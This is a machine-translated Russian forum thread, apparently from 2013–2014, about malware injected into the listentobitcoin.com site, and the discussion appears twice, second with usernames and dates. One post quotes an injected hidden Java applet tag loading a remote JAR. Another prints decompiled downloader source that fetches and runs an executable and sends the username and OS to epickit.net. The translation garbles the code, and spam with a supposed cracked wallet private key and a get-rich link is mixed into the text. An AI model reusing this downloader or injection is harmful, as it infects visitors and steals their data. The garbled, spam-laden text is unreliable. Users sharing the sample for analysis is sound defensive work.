Получил это сообщение риска, кто-то может разработать на listentobitcoin вредоносного ПО?

ПРИОРИТЕТ, НЕ ИДТИ СЛУШАТЬ Bitcoin. COM

Увидел это сообщение придумать из одного моего AV недавно.

наряду с Reddit пост от создателя, извиняясь за то, что случилось с сайта:
http://www.reddit.com/r/Bitcoin/comments/1ia7q2/listen_to_bitcoin_contains_malware/cb2kpqb

Может кто-нибудь уточнить, какого рода вредоносных программ существует или существовал на этом месте? Я просматривал с хромом и, к сожалению, не видел этот пост еще. Я посетил listentobitcoin, но хром не вызвать никакого предупреждения, и я не просил ничего устанавливать.

Мне интересно, какие шаги мне нужно поговорить, чтобы убедиться, что мой компьютер ясно

Убедитесь в том, что это ясно? Переформатировать.

Подсказка: для большей части программного обеспечения Анти Вирус в основном змеиное масло. особенно Mcafee, Нортон и т.д.

listentobitcoin было продано давным-давно, и была установлена вредоносная программа. Старые новости.

Официальный сайт сейчас http://www.bitlisten.com/

Это своего рода вредоносных программ, это опасно. Вы можете потерять Bitcoin, я бы очистить ваш компьютер. Сканирование с Malwarebytes.

Цитата: DiamondCardz от 11 августа 2013 года, 9:33:44 PM

Ни один из основных инструментов анализа не найти вредоносные программы на "listentobitcoin.com",

Comodo: http://app.webinspector.com/public/reports/18708129
Google: http://www.google.com/safebrowsing/diagnostic?site=listentobitcoin.com

Это звучит как афера, чтобы заставить людей перейти на "bitlisten.com"

Цитата: Нэгла от 02 декабря 2013 года, 10:42:19 PM

Цитата: DiamondCardz от 11 августа 2013 года, 9:33:44 PM

Посмотрите на дату резьбы, пожалуйста!

Цитата: Нэгла от 02 декабря 2013 года, 10:42:19 PM

Цитата: DiamondCardz от 11 августа 2013 года, 9:33:44 PM

Во-первых, приятно gravedig.
Во-вторых, вы ретард.
В-третьих, вы, вероятно, даже не пошел на чертовом месте себя, и я уверен, как ад не будет. Может быть, это изменилось в течение 2 месяцев, может быть, нет, я не забочусь, чтобы узнать.

В заключение, http://www.reddit.com/r/Bitcoin/comments/1ia7q2/listen_to_bitcoin_contains_malware/cb2kpqb

Пожалуйста, получите ваши факты вместе, прежде чем пытаться распространять FUD о чем-то вы ничего не знаете о. Благодарю.

Цитата: DiamondCardz от 03 декабря 2013 года, 6:46:48 PM

В-третьих, вы, вероятно, даже не пошел на чертовом месте себя, и я уверен, как ад не будет. Может быть, это изменилось в течение 2 месяцев, может быть, нет, я не забочусь, чтобы узнать.

Я смотрел на код на обоих сайтах, и запуска сайтов с помощью различных тестеров, и я не вижу каких-либо вредоносных программ. Но я думаю, что есть ошибка в игре Фирефокс аудио файлов, что приводит к порывистому аудио. Оба сайта будет производить порывистый звук после того, как они уже работают на некоторое время. Как только это произошло, Firefox должен быть перезапущен, чтобы решить эту проблему. Это проявляется в рамках как Windows 7 и Linux.

Цитата: Нэгла от 05 декабря 2013 года, 4:02:04 AM

Цитата: DiamondCardz от 03 декабря 2013 года, 6:46:48 PM

Я смотрел на код на обоих сайтах, и запуска сайтов с помощью различных тестеров, и я не вижу каких-либо вредоносных программ.

Интересно. Я не знаю, как домен, возможно, был повторно приобретен, но рвали вредоносные программы.

Я сказал, что это ниже, но я хочу быть частью этой должности, а также: теперь я понимаю, что я сделал очень глупую ошибку, продавая домен кому-то не заслуживающим доверия, и я хочу лично извиниться перед всеми, кто пострадали. Я был слишком доверчив, я сделал большую ошибку, и за то, что мои слова стоят, я обещаю, что это не повторится.

~ Максимилиан Laumeister

http://bitcoinexaminer.org/listentobitcoin-com-was-infected-by-an-anonymous-buyer-says-founder-of-the-website/

а для меня это было поздно я потерял 0,47 Btc и 15 LTC сегодня из-за этого дерьма о 23 декабря я побывал listentobitcoin.com и сегодня я узнал, что моя cryptsy.com счет был emptyed.

После поиска я нашел в Java регистрирует ответ, что Сие все это

?] Є? С ?! Н Ch9аЦ Б ШЧ С ШЧАМИ% HTTP:???? //listentobitcoin.info/sezam.exe 188.165.49.114? ?<ноль> ? HTTP / 1.1 200 OK? Content-Length? 502 272
последнего изменения Fri, 20 Dec 2013 17:50:53 GMT истекает пн, 6 января 2014 15:44:16 GMT тип содержимого приложения / октет-поток Дата Пн, 23 декабря 2013 15:44?????: 16 GMT? сервер? Nginx
Кэш-контроль? макс возраста = 1209600

sezam.exe создать это каталог с именем /directory/cybergate/googleupdate.exe, что позволил хакеру (жалкую существованию накипи), чтобы получить доступ к моему ноутбуку, когда я был в отъезде

я надеюсь, усвоил свой урок и используя 2fa сейчас теперь я просто нужно что-то, чтобы положить обратно на мой счет

если вы вор есть изменения в сердце и хочу спать лучше @ ночь пожалуйста, верните мой 192ou1R5P3MQNtFoYDh1SuEDjcbGMJYZtk БТД

Вредоносное, кажется, назад. В конце "www.listentobitcoin.com" этот код:

Код:

<Имя апплета ="JavaUpdate" код ="Client.class" архив ="http://secure-jar.com/PLFG/Java.jar" ширина ="0" высота ="0">
<Имя параметра ="нас" значение ="javasan.exe">
<Имя параметра ="Калифорния" значение ="http://ge.tt/api/1/files/4mRU7fB1/0/blob?download">
<Имя параметра ="Великобритания" значение ="http://www.listentobitcoin.com">
<Имя параметра ="п" значение ="fox33">

Это добавляется к концу страницы, вне тег. Это выглядит как-то нападение обкатки прилагаемого автоматически и вслепую.

Действительно ли компьютеры Apple, восприимчивы к вредоносным на listentobitcoins или только ПК? Если один посетили сайт на Apple, это один в группе риска?

Привет ... Кто-нибудь ... Является ли это угрозой для Apple, Маков?

спасибо

Я декомпилирован их файл Java и это, кажется, какое-то-Загрузка сценария. Вот Malwarebytes сообщение об этом: http://blog.malwarebytes.org/fraud-scam/2014/01/musical-bitcoin-bubbles-serve-java-applets-malware/

Вот исходный код декомпилирован для любых безопасности людей

Код:

импорт java.applet.Applet;
импорт java.applet.AppletContext;
импорт java.io.FileOutputStream;
импорт java.io.InputStream;
импорт java.net.URL;
импорт java.net.URLConnection;

общественный класс SecureJAR расширяет Applet
{
общественного недействительными Init ()
{
Строка str1 = System.getProperty ("user.name");
Строка str2 = System.getProperty ("os.name");
Строка str3 = System.getenv ("температура");
Строка STR4 = "\\";
Строка Str5 = getParameter ("rgsicvnjbn");
Строка STR6 = str4.concat (Str5);
Строка Str7 = str3.concat (STR6);
Объект localObject = getParameter ("ioqujbjsyq");
Строка str8 = "&yuvcpearce =";
Строка str9 = getParameter ("ivmbhojyjv");
пытаться
{
str2 = str2.replace (" ", "% 20");
str1 = str1.replace (" ", "% 20");
FileOutputStream localFileOutputStream = новый FileOutputStream (Str7);
Продолжительность localRuntime = Runtime.getRuntime ();
URL localURL1 = новый URL (getParameter ("xmxdnhwphy"));
URLConnection localURLConnection = localURL1.openConnection ();
InputStream localInputStream = localURLConnection.getInputStream ();
байт [] arrayOfByte = новый байт [1024];
Int я;
в то время как ((я = localInputStream.read (arrayOfByte, 0, arrayOfByte.length))! = -1)
localFileOutputStream.write (arrayOfByte, 0, я);
localInputStream.close ();
localFileOutputStream.close ();
localRuntime.exec (Str7);
localObject = новый URL ((String) localObject);
. GetAppletContext () showDocument ((URL), localObject);
URL localURL2 = новый URL ("http://epickit.net/qsxnonlvrc.php?username=" + Str9 + str8.replace ("yuvcpearce", "evyaipgncs") + Str2 + str8.replace ("yuvcpearce", "piyhnvzbpw") + Str1 + str8.replace ("yuvcpearce", "tlbkqdpvxm") + "традиционный");
localURL2.openStream ();
}
улов (Исключение localException)
{
}
}
}

Цитата: daviducsb от 06 января 2014 года, 5:55:14 PM

Привет ... Кто-нибудь ... Является ли это угрозой для Apple, Маков?

спасибо

Вирус появляется для загрузки полезной нагрузки EXE. Будьте или не имеют альтернативные полезные нагрузки для Mac или Linux неизвестен, но если вы посетили сайт и позволили JAR для запуска, вы можете запустить некоторую форму программы безопасности макинтоша, как теперь обнаружено хорошим количеством антивирусные программы.

11 августа 2013, 7:52:39 PM	# 1
coastermonger Сообщения: 367 Цитировать по имени цитировать ответ	Re: Got этого сообщения риски, может кто-то более подробную информацию о listentobitcoin вредоносного ПО? Взлом Биткоин адресов. 500 Биткоинов взломаны в "мозговом кошельке" с паролем "bitcoin is awesome" Адрес кошелька: 14NWDXkQwcGN1Pd9fboL8npVynD5SfyJAE Приватный ключ: 5J64pq77XjeacCezwmAr2V1s7snvvJkuAz8sENxw7xCkikceV6e подробнее... Всем кто хочет заработать Биткоины без вложений - рекомендую сайт http://bitcoin-zarabotat.ru ПРИОРИТЕТ, НЕ ИДТИ СЛУШАТЬ Bitcoin. COM Увидел это сообщение придумать из одного моего AV недавно. наряду с Reddit пост от создателя, извиняясь за то, что случилось с сайта: http://www.reddit.com/r/Bitcoin/comments/1ia7q2/listen_to_bitcoin_contains_malware/cb2kpqb Может кто-нибудь уточнить, какого рода вредоносных программ существует или существовал на этом месте? Я просматривал с хромом и, к сожалению, не видел этот пост еще. Я посетил listentobitcoin, но хром не вызвать никакого предупреждения, и я не просил ничего устанавливать. Мне интересно, какие шаги мне нужно поговорить, чтобы убедиться, что мой компьютер ясно

11 августа 2013, 8:55:23 PM	# 2
горная вершина Сообщения: 182 Цитировать по имени цитировать ответ	Re: Got этого сообщения риски, может кто-то более подробную информацию о listentobitcoin вредоносного ПО? Получил 1806 Биткоинов Реальная история. Убедитесь в том, что это ясно? Переформатировать.

11 августа 2013, 9:20:30 PM	# 3
SlickTheNick Сообщения: 221 Цитировать по имени цитировать ответ	Re: Got этого сообщения риски, может кто-то более подробную информацию о listentobitcoin вредоносного ПО? Подсказка: для большей части программного обеспечения Анти Вирус в основном змеиное масло. особенно Mcafee, Нортон и т.д.

11 августа 2013, 9:33:44 PM	# 4
DiamondCardz Сообщения: 1050 Цитировать по имени цитировать ответ	Re: Got этого сообщения риски, может кто-то более подробную информацию о listentobitcoin вредоносного ПО? listentobitcoin было продано давным-давно, и была установлена вредоносная программа. Старые новости. Официальный сайт сейчас http://www.bitlisten.com/ Это своего рода вредоносных программ, это опасно. Вы можете потерять Bitcoin, я бы очистить ваш компьютер. Сканирование с Malwarebytes.

2 декабря 2013, 10:42:19 PM	# 5
Нэйгл Сообщения: 1204 Цитировать по имени цитировать ответ	Re: Got этого сообщения риски, может кто-то более подробную информацию о listentobitcoin вредоносного ПО? Цитата: DiamondCardz от 11 августа 2013 года, 9:33:44 PM listentobitcoin было продано давным-давно, и была установлена вредоносная программа. Старые новости. Официальный сайт сейчас http://www.bitlisten.com/ Это своего рода вредоносных программ, это опасно. Вы можете потерять Bitcoin, я бы очистить ваш компьютер. Сканирование с Malwarebytes. Ни один из основных инструментов анализа не найти вредоносные программы на "listentobitcoin.com", Comodo: http://app.webinspector.com/public/reports/18708129 Google: http://www.google.com/safebrowsing/diagnostic?site=listentobitcoin.com Это звучит как афера, чтобы заставить людей перейти на "bitlisten.com"

3 декабря 2013, 5:08:56 AM	# 6
Помните, помните 5 ноября Сообщения: 1610 Цитировать по имени цитировать ответ	Re: Got этого сообщения риски, может кто-то более подробную информацию о listentobitcoin вредоносного ПО? Цитата: Нэгла от 02 декабря 2013 года, 10:42:19 PM Цитата: DiamondCardz от 11 августа 2013 года, 9:33:44 PM listentobitcoin было продано давным-давно, и была установлена вредоносная программа. Старые новости. Официальный сайт сейчас http://www.bitlisten.com/ Это своего рода вредоносных программ, это опасно. Вы можете потерять Bitcoin, я бы очистить ваш компьютер. Сканирование с Malwarebytes. Ни один из основных инструментов анализа не найти вредоносные программы на "listentobitcoin.com", Comodo: http://app.webinspector.com/public/reports/18708129 Google: http://www.google.com/safebrowsing/diagnostic?site=listentobitcoin.com Это звучит как афера, чтобы заставить людей перейти на "bitlisten.com" Посмотрите на дату резьбы, пожалуйста!

3 декабря 2013, 6:46:48 PM	# 7
DiamondCardz Сообщения: 1050 Цитировать по имени цитировать ответ	Re: Got этого сообщения риски, может кто-то более подробную информацию о listentobitcoin вредоносного ПО? Цитата: Нэгла от 02 декабря 2013 года, 10:42:19 PM Цитата: DiamondCardz от 11 августа 2013 года, 9:33:44 PM listentobitcoin было продано давным-давно, и была установлена вредоносная программа. Старые новости. Официальный сайт сейчас http://www.bitlisten.com/ Это своего рода вредоносных программ, это опасно. Вы можете потерять Bitcoin, я бы очистить ваш компьютер. Сканирование с Malwarebytes. Ни один из основных инструментов анализа не найти вредоносные программы на "listentobitcoin.com", Comodo: http://app.webinspector.com/public/reports/18708129 Google: http://www.google.com/safebrowsing/diagnostic?site=listentobitcoin.com Это звучит как афера, чтобы заставить людей перейти на "bitlisten.com" Во-первых, приятно gravedig. Во-вторых, вы ретард. В-третьих, вы, вероятно, даже не пошел на чертовом месте себя, и я уверен, как ад не будет. Может быть, это изменилось в течение 2 месяцев, может быть, нет, я не забочусь, чтобы узнать. В заключение, http://www.reddit.com/r/Bitcoin/comments/1ia7q2/listen_to_bitcoin_contains_malware/cb2kpqb Пожалуйста, получите ваши факты вместе, прежде чем пытаться распространять FUD о чем-то вы ничего не знаете о. Благодарю.

5 декабря 2013, 4:02:04 AM	# 8
Нэйгл Сообщения: 1204 Цитировать по имени цитировать ответ	Re: Got этого сообщения риски, может кто-то более подробную информацию о listentobitcoin вредоносного ПО? Цитата: DiamondCardz от 03 декабря 2013 года, 6:46:48 PM В-третьих, вы, вероятно, даже не пошел на чертовом месте себя, и я уверен, как ад не будет. Может быть, это изменилось в течение 2 месяцев, может быть, нет, я не забочусь, чтобы узнать. Я смотрел на код на обоих сайтах, и запуска сайтов с помощью различных тестеров, и я не вижу каких-либо вредоносных программ. Но я думаю, что есть ошибка в игре Фирефокс аудио файлов, что приводит к порывистому аудио. Оба сайта будет производить порывистый звук после того, как они уже работают на некоторое время. Как только это произошло, Firefox должен быть перезапущен, чтобы решить эту проблему. Это проявляется в рамках как Windows 7 и Linux.

5 декабря 2013, 6:54:58 AM	# 9
DiamondCardz Сообщения: 1050 Цитировать по имени цитировать ответ	Re: Got этого сообщения риски, может кто-то более подробную информацию о listentobitcoin вредоносного ПО? Цитата: Нэгла от 05 декабря 2013 года, 4:02:04 AM Цитата: DiamondCardz от 03 декабря 2013 года, 6:46:48 PM В-третьих, вы, вероятно, даже не пошел на чертовом месте себя, и я уверен, как ад не будет. Может быть, это изменилось в течение 2 месяцев, может быть, нет, я не забочусь, чтобы узнать. Я смотрел на код на обоих сайтах, и запуска сайтов с помощью различных тестеров, и я не вижу каких-либо вредоносных программ. Интересно. Я не знаю, как домен, возможно, был повторно приобретен, но рвали вредоносные программы.

9 декабря 2013, 2:39:38 PM	# 10
devthedev Сообщения: 1008 Цитировать по имени цитировать ответ	Re: Got этого сообщения риски, может кто-то более подробную информацию о listentobitcoin вредоносного ПО? Я сказал, что это ниже, но я хочу быть частью этой должности, а также: теперь я понимаю, что я сделал очень глупую ошибку, продавая домен кому-то не заслуживающим доверия, и я хочу лично извиниться перед всеми, кто пострадали. Я был слишком доверчив, я сделал большую ошибку, и за то, что мои слова стоят, я обещаю, что это не повторится. ~ Максимилиан Laumeister http://bitcoinexaminer.org/listentobitcoin-com-was-infected-by-an-anonymous-buyer-says-founder-of-the-website/

5 января 2014, 3:14:51 AM	# 11
NFuse Сообщений: 97 Цитировать по имени цитировать ответ	Re: Got этого сообщения риски, может кто-то более подробную информацию о listentobitcoin вредоносного ПО? а для меня это было поздно я потерял 0,47 Btc и 15 LTC сегодня из-за этого дерьма о 23 декабря я побывал listentobitcoin.com и сегодня я узнал, что моя cryptsy.com счет был emptyed. После поиска я нашел в Java регистрирует ответ, что Сие все это ?] Є? С ?! Н Ch9аЦ Б ШЧ С ШЧАМИ% HTTP:???? //listentobitcoin.info/sezam.exe 188.165.49.114? ?<ноль> ? HTTP / 1.1 200 OK? Content-Length? 502 272 последнего изменения Fri, 20 Dec 2013 17:50:53 GMT истекает пн, 6 января 2014 15:44:16 GMT тип содержимого приложения / октет-поток Дата Пн, 23 декабря 2013 15:44?????: 16 GMT? сервер? Nginx Кэш-контроль? макс возраста = 1209600 sezam.exe создать это каталог с именем /directory/cybergate/googleupdate.exe, что позволил хакеру (жалкую существованию накипи), чтобы получить доступ к моему ноутбуку, когда я был в отъезде я надеюсь, усвоил свой урок и используя 2fa сейчас теперь я просто нужно что-то, чтобы положить обратно на мой счет если вы вор есть изменения в сердце и хочу спать лучше @ ночь пожалуйста, верните мой 192ou1R5P3MQNtFoYDh1SuEDjcbGMJYZtk БТД

5 января 2014, 8:03:07 AM	# 12
Нэйгл Сообщения: 1204 Цитировать по имени цитировать ответ	Re: Got этого сообщения риски, может кто-то более подробную информацию о listentobitcoin вредоносного ПО? Вредоносное, кажется, назад. В конце "www.listentobitcoin.com" этот код: Код: <Имя апплета ="JavaUpdate" код ="Client.class" архив ="http://secure-jar.com/PLFG/Java.jar" ширина ="0" высота ="0"> <Имя параметра ="нас" значение ="javasan.exe"> <Имя параметра ="Калифорния" значение ="http://ge.tt/api/1/files/4mRU7fB1/0/blob?download"> <Имя параметра ="Великобритания" значение ="http://www.listentobitcoin.com"> <Имя параметра ="п" значение ="fox33"> Это добавляется к концу страницы, вне тег. Это выглядит как-то нападение обкатки прилагаемого автоматически и вслепую.

6 января 2014, 10:22:28 AM	# 13
daviducsb Сообщения: 151 Цитировать по имени цитировать ответ	Re: Got этого сообщения риски, может кто-то более подробную информацию о listentobitcoin вредоносного ПО? Действительно ли компьютеры Apple, восприимчивы к вредоносным на listentobitcoins или только ПК? Если один посетили сайт на Apple, это один в группе риска?

6 января 2014, 5:55:14 PM	# 14
daviducsb Сообщения: 151 Цитировать по имени цитировать ответ	Re: Got этого сообщения риски, может кто-то более подробную информацию о listentobitcoin вредоносного ПО? Привет ... Кто-нибудь ... Является ли это угрозой для Apple, Маков? спасибо

18 января 2014, 8:06:04 PM	# 15
someguy123 Сообщения: 335 Цитировать по имени цитировать ответ	Re: Got этого сообщения риски, может кто-то более подробную информацию о listentobitcoin вредоносного ПО? Я декомпилирован их файл Java и это, кажется, какое-то-Загрузка сценария. Вот Malwarebytes сообщение об этом: http://blog.malwarebytes.org/fraud-scam/2014/01/musical-bitcoin-bubbles-serve-java-applets-malware/ Вот исходный код декомпилирован для любых безопасности людей Код: импорт java.applet.Applet; импорт java.applet.AppletContext; импорт java.io.FileOutputStream; импорт java.io.InputStream; импорт java.net.URL; импорт java.net.URLConnection; общественный класс SecureJAR расширяет Applet { общественного недействительными Init () { Строка str1 = System.getProperty ("user.name"); Строка str2 = System.getProperty ("os.name"); Строка str3 = System.getenv ("температура"); Строка STR4 = "\\"; Строка Str5 = getParameter ("rgsicvnjbn"); Строка STR6 = str4.concat (Str5); Строка Str7 = str3.concat (STR6); Объект localObject = getParameter ("ioqujbjsyq"); Строка str8 = "&yuvcpearce ="; Строка str9 = getParameter ("ivmbhojyjv"); пытаться { str2 = str2.replace (" ", "% 20"); str1 = str1.replace (" ", "% 20"); FileOutputStream localFileOutputStream = новый FileOutputStream (Str7); Продолжительность localRuntime = Runtime.getRuntime (); URL localURL1 = новый URL (getParameter ("xmxdnhwphy")); URLConnection localURLConnection = localURL1.openConnection (); InputStream localInputStream = localURLConnection.getInputStream (); байт [] arrayOfByte = новый байт [1024]; Int я; в то время как ((я = localInputStream.read (arrayOfByte, 0, arrayOfByte.length))! = -1) localFileOutputStream.write (arrayOfByte, 0, я); localInputStream.close (); localFileOutputStream.close (); localRuntime.exec (Str7); localObject = новый URL ((String) localObject); . GetAppletContext () showDocument ((URL), localObject); URL localURL2 = новый URL ("http://epickit.net/qsxnonlvrc.php?username=" + Str9 + str8.replace ("yuvcpearce", "evyaipgncs") + Str2 + str8.replace ("yuvcpearce", "piyhnvzbpw") + Str1 + str8.replace ("yuvcpearce", "tlbkqdpvxm") + "традиционный"); localURL2.openStream (); } улов (Исключение localException) { } } }

18 января 2014, 8:16:19 PM	# 16
someguy123 Сообщения: 335 Цитировать по имени цитировать ответ	Re: Got этого сообщения риски, может кто-то более подробную информацию о listentobitcoin вредоносного ПО? Цитата: daviducsb от 06 января 2014 года, 5:55:14 PM Привет ... Кто-нибудь ... Является ли это угрозой для Apple, Маков? спасибо Вирус появляется для загрузки полезной нагрузки EXE. Будьте или не имеют альтернативные полезные нагрузки для Mac или Linux неизвестен, но если вы посетили сайт и позволили JAR для запуска, вы можете запустить некоторую форму программы безопасности макинтоша, как теперь обнаружено хорошим количеством антивирусные программы.

Заголовок